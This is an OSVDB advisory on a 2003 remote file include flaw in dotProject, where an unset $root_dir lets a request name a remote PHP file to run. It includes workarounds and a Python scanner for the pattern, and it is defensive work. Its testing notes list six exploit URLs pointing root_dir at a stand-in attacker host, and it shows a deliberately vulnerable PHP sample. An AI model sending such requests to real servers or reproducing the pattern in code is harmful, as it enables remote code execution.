dotProject classdefs/date.php $root_dir Arbitrary File Include

2003-01-29T00:00:00
ID OSVDB:3592
Type osvdb
Reporter OSVDB
Modified 2003-01-29T00:00:00

Description

Vulnerability Description

dotProject contains a flaw that allows a remote attacker to include arbitrary files. Numerous scripts under the modules/ directory build the path used to include classdefs/date.php from the $root_dir variable without first defining it or restricting its value. An attacker who can supply that variable (the example requests below pass it as a query-string parameter, which reaches the script when PHP's register_globals is enabled) can point it at an arbitrary server, path or file name. Because the included file is parsed as PHP, any code it contains is executed on the vulnerable server with the privileges of the web server process.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. The flaw can be mitigated with the following workaround: create a .htaccess file containing 'Deny from all' in the /modules/ directory. This blocks direct HTTP requests to the affected scripts; it does not affect files the application includes server-side. Check that Apache honours .htaccess files in that directory (AllowOverride must permit the Limit directive group, or the Deny is silently ignored), and consider disabling register_globals and allow_url_fopen in php.ini, which remove the request-supplied variable and the remote-include path respectively.
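The following check is an added example, not code from the advisory or from dotProject. It shows the include pattern described above beside a corrected form, and a small static scan that flags an include or require whose path starts with a variable that the file never assigns. The two PHP snippets are constructed to illustrate the shape of the flaw; they are assumed, not dotProject's actual source, and the directory depth used in the fixed version is likewise an assumption.

```python
import re

# Constructed sample (assumed shape, not dotProject's own code): the path is
# built from $root_dir, which nothing in the file sets. With register_globals
# on, ?root_dir=http://attacker makes PHP fetch and execute a remote file.
VULNERABLE_PHP = """<?php
include_once "$root_dir/classdefs/date.php";
?>"""

# Corrected form: derive $root_dir from the script's own location before use,
# so a request-supplied value is overwritten. (Depth chosen for illustration.)
FIXED_PHP = """<?php
$root_dir = dirname(dirname(dirname(__FILE__)));
include_once "$root_dir/classdefs/date.php";
?>"""

# An include whose first path component is a superglobal is not the pattern
# at issue here (it is set by PHP, not by the request via register_globals).
SUPERGLOBAL_PHP = """<?php
require_once $_SERVER['DOCUMENT_ROOT'] . '/lib/date.php';
?>"""

# include/require[_once], optional parenthesis and opening quote, then a variable.
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*(["\'])?\s*\$(\w+)')
# Plain assignment to a variable ($x = ...), excluding comparisons ($x == ...).
ASSIGN_RE = re.compile(r'\$(\w+)\s*=[^=]')
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_FILES", "_COOKIE",
                "_SESSION", "_REQUEST", "_ENV"}


def uninitialized_includes(php_source):
    """Return [(line_number, variable)] for every include/require whose path
    begins with a variable not assigned earlier in the same file.

    This is a file-local heuristic: it does not follow includes or detect
    assignments made in another file, so treat hits as candidates to review."""
    assigned = set()
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        stripped = line.lstrip()
        if stripped.startswith("//") or stripped.startswith("#"):
            continue  # skip single-line comments
        m = INCLUDE_RE.search(line)
        if m:
            var = m.group(2)
            if var not in assigned and var not in SUPERGLOBALS:
                findings.append((lineno, var))
        # Record assignments after checking, so "$x = include $x" still flags.
        for a in ASSIGN_RE.finditer(line):
            assigned.add(a.group(1))
    return findings


if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE_PHP), ("fixed", FIXED_PHP),
                      ("superglobal", SUPERGLOBAL_PHP)):
        print(name, uninitialized_includes(src))
```

Run against a checkout, the scan lists the scripts that build an include path from a never-assigned variable, which is exactly the set an attacker would probe with root_dir= requests; it says nothing about whether register_globals is on, so confirm that separately in php.ini.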

Short Description

dotProject contains a flaw that allows a remote attacker to include arbitrary files via the undefined $root_dir variable used to locate classdefs/date.php, leading to execution of attacker-supplied PHP code on the vulnerable server.

Manual Testing Notes

http://[victim]/dotproject/modules/files/index_table.php?root_dir=http://attacker
http://[victim]/dotproject/modules/projects/addedit.php?root_dir=http://attacker
http://[victim]/dotproject/modules/projects/view.php?root_dir=http://attacker
http://[victim]/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
http://[victim]/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
http://[victim]/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker

References:

Vendor URL: http://www.dotproject.net/
Secunia Advisory ID: 7974
Related OSVDB ID: 3593
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-01/0344.html
ISS X-Force ID: 11192
Bugtraq ID: 6710